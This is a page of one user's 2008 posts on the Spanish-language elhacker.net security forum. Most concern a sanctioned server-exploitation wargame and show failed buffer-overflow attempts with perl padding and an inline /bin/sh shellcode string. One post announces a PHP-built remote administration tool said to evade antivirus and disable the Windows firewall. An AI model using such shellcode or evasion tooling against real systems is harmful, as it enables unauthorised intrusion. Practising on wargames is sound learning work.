elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


  Mostrar Mensajes
Páginas: 1 ... 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 [420] 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 ... 456
4191  Seguridad Informática / WarZone / Re: Torneo de explotacion de servidores en: 2 Diciembre 2008, 02:44 am
Citar
Podriais capar el netstat -an
+ Como dice sdc, /var/log
+ /tmp (no se porque ahi hay unos directorios que dicen imagenes y aparece uno con el nombre de sdc  :huh:)
+ lo del netstat ya lo habia visto al igual que ifconfig y podías ver cuantas personas estaban conectadas viendo el puerto de conexión http(80).
+ /media (No tiene lectores o discos esclavos  :( )
+ Hay unos juegos muy chidos para consola  ;D podrías subirlos en un zip para jugarlos en local jaja.

En fin pero nada de explotación jajaja creo que no es mi fuerte, no todos tenemos el mismo tipo de conocimiento verdad?  :P

Anon podrías habilitar el comando msg para conversar con los usuarios que estén dentro como se hizo la otra ves.

Saludos y suerte para el resto
4192  Seguridad Informática / WarZone / Re: Torneo de explotacion de servidores en: 1 Diciembre 2008, 01:57 am
Nop no carga, ayer el servidor real del warzone también estaba off y como se veia la shell funcionando ps lo mas probable es que alguien esté lanzando algún ataque ddos.
Si es así lo mas probable también es que no tenga ni la mas minima idea de como entrar y por frustración la gente se desespera y comienza a hacer tonterías para sentirse tomados en cuenta.

(sugerencia) Sdc, podrías poner la web en un servidor ajeno a la shell y en ves de entrar que te de la ip del servidor con la shell real y asi evitas que un ataque al pedo proboque que no podamos entrar
4193  Seguridad Informática / WarZone / Re: Torneo de explotacion de servidores en: 30 Noviembre 2008, 02:35 am
Si, no se ve pero la shell anda impecable porque no está dentro del servidor del wargame.

http://shell.wargame.elhacker.net/
4194  Seguridad Informática / WarZone / Re: Torneo de explotacion de servidores en: 30 Noviembre 2008, 02:01 am
Ya, me aburrí, mañana será otro dia  :P

Citar
./BoF `perl -e 'print "?" x 998'``../xxx/shellcode`
./BoF `perl -e 'print "?" x 1036'``../xxx/shellcode`

Citar
Segmentation fault

Probé del 990 al 1070 para ver si me habia equibocado en el tamaño de la shellcode pero nada. y pruebo la shellcode y me lanza la shell pero al bolcar el buffer sobre el BoF no funciona. Para eso tube que modificar de la ejecución a printf guiandome por goodfellas (http://goodfellas.shellcode.com.ar/bsd.html).

Citar
$ ./BoF `perl -e 'print "?" x 1035'``../xxx/shellcode`
Mas facil no se puede xD
Usted paso como parametro lo siguiente:
...
Segmentation fault
$

Tampoco ..

Citar
./BoF `perl -e 'print "?" x 1056 . "\xeb\x17\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\x50\x8d\x53\x08\x52\x53\xb0\x3b\x50\xcd\x80\xe8\xe4\xff\xff\xff/bin/sh";'`
Mas facil no se puede xD
Usted paso como parametro lo siguiente:
...
Segmentation fault
$
[/quote]

Tampoco, shaaaaaa  :rolleyes:

Citar
???????????????????????????????????????Ù↨[1└êCëëC♀PìRS░;P═ÇÞõ   /bin/sh
/libexec/ld-elf.so.1: environment corrupt; missing value for ☻
/libexec/ld-elf.so.1: environment corrupt; missing value for ☻
/libexec/ld-elf.so.1: environment corrupt; missing value for ☻
/libexec/ld-elf.so.1: environment corrupt; missing value for ☻
/libexec/ld-elf.so.1: environment corrupt; missing value for ☻
chown: not found
chown: not found
Mas facil no se puede xD
Usted paso como parametro lo siguiente:

¾Ý┐┐☺¯┐┐↕¯┐┐&¯┐┐N¯┐┐V¯┐┐c¯┐┐ǯ┐┐ø¯┐┐ª¯┐┐▓¯┐┐┐¯┐┐╦¯┐┐ί┐┐>´┐┐J´┐┐P´┐┐_´┐┐n´┐┐Ç´┐┐
ò´┐┐ª´┐┐
Segmentation fault
$
4195  Seguridad Informática / WarZone / Re: Torneo de explotacion de servidores en: 30 Noviembre 2008, 00:12 am
Citar
$FreeBSD: src/lib/csu/i386-elf/crti.S,v 1.7 2005/05/19 07:31:06 dfr Exp $  Adv
ertencia "/usr/home/warzone/validar"
Solo puede ser ejecutado 10 veces por Usted
Esta vez no cuenta solo le informa el uso:
        Debera ejecutarlo usando path absoluto o relativo
        da igual esto es asu gusto.
Se le pedira el hash del reto N, donde N el ultimo reto que ha Ejecutado
Esto es por seguridad y para evitar un ForceBrute.
Note que cada vez que ejecute los programas vulnerables se va
a generar un Hash Aleatorio

        Saludos y Suerte.

Anon.
 /usr/home/warzone/.db/count_ /usr/home/warzone/.db/reto_ %s%d r+ %s w fopen():
%s r    Usted no a ejecutado ningun Reto!
No cuenta esta ejecucion Ejecutado: %d
 Hash de la Prueba %d:  Perfecto ;)    /usr/home/warzone/.db/grupos %d %d %d No
es Igual!! ;(  Lo sentimos ya ha sobrepaso el limite de Ejecuciones!!
 Guadar calloc(): %s $FreeBSD: src/lib/csu/i386-elf/crtn.S,v 1.6 2005/05/19 07:3
   \♦   $♣   á♠   Óü♦ ¶á┤î    ☺   §   ♀   îà♦

Como es que puedo ejecutarlo solo 10 veces si cuando lo ejecuto me da errores
Citar
sh ./validar
‼4: not found
⌂ELF☺☺☺: not found
./validar: 4: Syntax error: "(" unexpected (expecting ")")

No sabía que solo se podía ejecutar 10 veces :-s talves ya la jodí jajaja o talves se ejecute bién cuando logre pasar la primera parte no se pero bueno.

PD: Olvidalo ya se que pasó y estoy viendo lo de la shellcode.
4196  Seguridad Informática / WarZone / Re: Torneo de explotacion de servidores en: 29 Noviembre 2008, 21:14 pm
Ya entré.

Citar
Mas facil no se puede xD
    Se esperaban Parametros!!
Uso:
        %s <algo>
  Usted paso como parametro lo siguiente:

%s
 calloc(): %s

Esto me recuerda y si es que no me equivoco debe ser el mismo, la prueba que hicieron hace tiempo en la sección de wargames donde alguien prestó su servidor con el mismo sistema donde estamos ahora y al parecer con el mismo programa y con la misma falla  :P solo que la shell no es una shell sino que es un pipe a quien sabe donde.

De todas formas intenté:
Citar
sh ./validar `perl -e 'print "?" x 1036'`
aunque en checker y BoF me dió lo mismo: nada.

No soy tan bueno para los bof como berz3k :P

PD: hacen mas de 30 grados de calor y me duele la cabeza a mares :-\
PD2: Busqué en los post anteriores del foro de wargames hasta la última página y ya no está  :huh: supongo que no lo movieron/borraron apropósito vdd?
4197  Seguridad Informática / WarZone / Re: Torneo de explotacion de servidores en: 29 Noviembre 2008, 08:55 am
Citar
ya lo viiiiii!!  es windowssssssssssssssssssssssssssssssssssssssssss
aunque dudo que logren encontrar como iniciar sesion mas del 10%

Yo pensaba que era bsd pero bueno, supongo que verificar los puertos tampoco hace daño no? el netcat me arrojó todos los puertos abiertos XD asi que tube que usar el nmap mejor y no encontré nada jajajaja no voy a decir como intenté entrar para que lo intenten también los demás  :P pero de todas las maneras que traté no pude.

Supongo que esto va de buena forma y no de mala verdad? por algo dieron user y pass, supongo que de entrada no hay que explotar nada como la falla de los win server o un rpcdcom  :rolleyes:.

Si la falla no va a nivel web supongo que la vulnerabilidad del php que tiene no tiene nada que ver  :P

Que rabia, con las ganas que tenía de entrar, suponiendo que es win sería mas fácil.
4198  Programación / PHP / Re: [Proyecto] El Maletín (Fuente) en: 18 Noviembre 2008, 22:37 pm
Código actualizado que repara el bug de la variable [-info] al no detectar valores en sistemas virtualizados.

estuve pensando seriamente que al cambiar el idioma de las respuestas que da la consola de comandos puede dar un valor erroneo al intentar capturarlo, voy a tener que hacerlo de una forma diferente detectando cada array de respuesta.

Hola IngAmc  ;D
4199  Programación / PHP / [Proyecto] El Maletín (Fuente) en: 17 Noviembre 2008, 21:34 pm
El maletín 1.2 Beta

Bueno, este no es un script para una web, sino la fuente para un archivo binario ejecutable para Win32.

Ahora ustedes dirán:
Citar
:o de php a exe??
Así es, con el BamCompiler.

De que se trata?... Es un software de administración remota donde la idea es que contenga todas las herramientas mas simples y necesarias para la buena y cómoda administración de una shell remota.

Expongo acá su código fuente para ver si me pueden apoyar en algunas lineas y dar ideas, etc.

Si alguien quiere ofrecerse de BetaTester pueden hacerlo en el subforo de "Análisis de malware".

La idea principal de este software es poder hacer pruebas localmente o remotamente pidiendoles la cooperación de la persona involucrada tal como se los estoy pidiendo yo, en ningún caso debe utilizarse para administrar un sistema que no sea de nuestra propiedad o sin el concentimiento de su dueño. Esto es para evitar problemas legales y poder comprender como protegernos ante ataques remotos sin la necesidad de presindir por el antivirus ya que hasta la fecha no es detectado por ningún sistema antimalware ni antivirus a exepción ovbiamente de los Firewalls, aunque con unas pequeñas funciones pueden deshabilitarse tal como lo programé para el firewall de Windows XP y Vista.

Descargar Fuente

Como pueden ver muchas de las funciones están sin crear ya que en php no hay Handle que puedas utilizar para alguna función, por lo cual me veo casi obligado a utilizar softwares externos como por ejemplo "REG" y "wmic".

Binario y Pruebas con el binario en este subforo:
http://foro.elhacker.net/analisis_y_diseno_de_malware/proyecto_el_maletin-t234529.0.html
4200  Seguridad Informática / Desafíos - Wargames / Re: Eres un Hacker? PRUEBALO CON ESTE TEST!!!!!! en: 16 Noviembre 2008, 18:04 pm
ya voy en la 8

Citar
<!-- YOU'RE LOOKING IN THE WRONG PLACE... GO BACK! -->
:¬¬

Editado
En la 9.
Reeditado :P
En la 10
Citar
Warning: Cannot modify header information - headers already sent by (output started at /home/hackert/public_html/gazebruh.php:11) in /home/hackert/public_html/gazebruh.php on line 58
Rereeditado
Vaya nombre del php del nivel 13  :P eso en mi pais tiene un significado.

rerererereditado  :xD
Citar
Congratulations! You have passed to level 10. Here, things become much more difficult ;-) Hope you get through! Enjoy.
ya lo terminé, de seguro el nivel 21 es este: http://www.hackertest.net:2082/login/
Páginas: 1 ... 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 [420] 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 ... 456
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines